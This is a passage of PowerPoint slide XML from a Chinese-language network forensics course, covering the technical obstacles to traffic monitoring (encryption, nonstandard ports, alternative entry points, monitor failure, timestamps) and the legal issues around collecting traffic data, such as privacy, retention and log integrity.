              <a:t>（安全套接层）等协议加密网络流数据时，处于加密通道上的监控设备仅能看到数据流的一些基本信息，例如源和目的的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址。如果使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（虚拟专网）或者其他的隧道技术，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址可能属于隧道本身，而不是网络活动的真实源地址和目的地址。为收集到解密的数据，收集设备必须位于能看到解密网络活动的地方。例如，直接将一个入侵检测感应器安装在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网关的后面，那么就能有效地在解密地通信中识别暗藏的活动。如果通信一直加密到内部的主机（比如一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加密的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>会话），那么监控设备就不能看到解密的数据报。应该考虑建立有关管理制度，规范网络中加密技术的合理使用，使得入侵检测感应器之类的安全控制设备能监视到那些不应该、不必要加密的网络数据内容。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="14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6.4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技术问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="699542"/>
            <a:ext cx="6480720" cy="4062651"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>六、服务运行在不明端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通常，入侵检测系统和协议分析器之类的设备依赖端口号来识别一个给定的链接使用了哪一种服务。然而，很多服务可以运行在任何一个端口号上。由于运行于不明端口号的服务的数据无法正确捕获、监控或者分析，未授权服务的使用（例如在一个异常端口提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务）就无法检测到。另外一个使用不明端口的目的，就是为了躲过基于端口过滤的设备的检测。通常有一些方法来辨别不明端口的使用，包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）配置入侵检测系统的传感器，使得能够在发现不明服务端口的连接时报警；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）配置应用层代理或者执行协议分析的入侵检测系统传感器，使得能够在发现不明协议的连接时报警（例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>流量数据却使用了标准的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口）；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）执行流量监测，辨认新的和不常用的网络流数据；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）在需要时，配置一个协议分析器来分析特定流量等信息。</a:t>
            </a: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6.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络取证的定义和特点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="1632595"/>
            <a:ext cx="5472608" cy="1731243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在实现方式上，网络取证通常与网络监控相结合，例如入侵检测技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(IDS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和蜜网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>honeynet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术，利用网络监控激活取证。网络可以显示入侵者突破网络的路径，揭示通过中间媒介的入侵，提供重要和确凿的证据，但通常不能单独处理某个案例，把嫌疑人和攻击事件直接关联。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"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6.4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技术问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="987574"/>
            <a:ext cx="6624736" cy="2736304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>七、改变了进入点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击者侵入网络，往往会避免经由具有互联网网关之类安全设备监控的主要通道进入网络，而是利用了其他的途径，典型的例子就是利用一台用户工作站的调制解调器。如果一个攻击者能拨号进入这个工作站并获得权限，就可以从这个工作站发起对其他主机的攻击。在这种情况下，由于活动不会通过防火墙、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>监控的网络段以及其他的数据收集点，所以很少或者几乎没有攻击活动的日志记载。应该对网络潜在的进入点加以限制，例如调制解调器和无线访问点，以确保每一个入口点都在安全设备的监控和管制之下。</a:t>
            </a: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6.4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技术问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7272808" cy="1708160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>八、监控失败</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由于各种原因，系统或者应用程序不可避免地会出现故障或终止运行，例如系统维护、软件问题、攻击等。在一个精心构造的监控系统（例如入侵检测系统）中，使用冗余设备（例如两个传感器监控同一个活动）就能减小监控失败造成的影响。另外一个措施就是执行多极监控，例如配置基于网络的监控和基于主机的监控来记录连接。</a:t>
            </a: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6.4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技术问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7272808" cy="1703864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>九、时间问题</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在网络取证中，当调查分析一个跨时区的恶意网络攻击事件时，必须了解操作系统和文件的时间（日期）属性，以建立正确反映事件的时间线，还原事件发生的真实次序。通常，不同的操作系统或者文件系统对其日期、时间值有不同的处理方法，但一般来说，文件或者目录有下列文件属性标签</a:t>
            </a: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6.4.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>法律方面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1059582"/>
            <a:ext cx="7272808" cy="2354491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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网络流量数据的收集会引起</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>法律问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。执法部门和企业内部的信息安全部门，都可以进行数据网络流量的收集，而后者引起的法律问题更多。其中之一就是捕获的信息（不管有意或是偶然）可能涉及到隐私或者安全方面，比如口令或者邮件的内容。可能会将信息暴露给分析人员和管理记录系统（比如入侵检测系统的传感器）的人员，因此企业应该制定策略来处理不经意流露的敏感信息。另一个问题就是关于捕获的信息如电子邮件和文本文件的长时间存储，可能会违反企业的相关数据保留规定。同时，企业应该制定相应的网络监控制度，并且在系统运行的某处设置警示标志，提醒用户当前的活动可能受到监视。</a:t>
            </a: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6.4.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>法律方面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1059582"/>
            <a:ext cx="7272808" cy="1980863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>虽然网络流量的收集在多数情况下是日常工作的一部分，同时也是故障排除或者事件处理的一部分。在后面一种情况下，保证操作过程的一致性和记录所有的动作是很重要的。例如，只有在一个正式的请求和同意过程完成之后，记录一个特定用户所有的接收和发送的数据包的工作才能启动。企业应该明确规定在未经许可情况下，哪些类型的数据可以或者不可以被记录，并且要详细描述请求和同意过程的每一个步骤。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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6.4.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>法律方面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1059582"/>
            <a:ext cx="7272808" cy="1657698"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>另一个潜在的法律问题是原始日志的保护。如前文所述，网络通信的日志文件副本会发送给中心设备，或者发送给负责解释和分析网络通信的工具软件。在需要这些日志作为证据的场合，应该很好地保护这些原始日志文件的副本、中心设备的日志文件、解释和分析程序的日志数据，以防止任何有关复制和解释过程真实性的质疑。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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6.4.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>法律方面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1059582"/>
            <a:ext cx="7272808" cy="1980863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
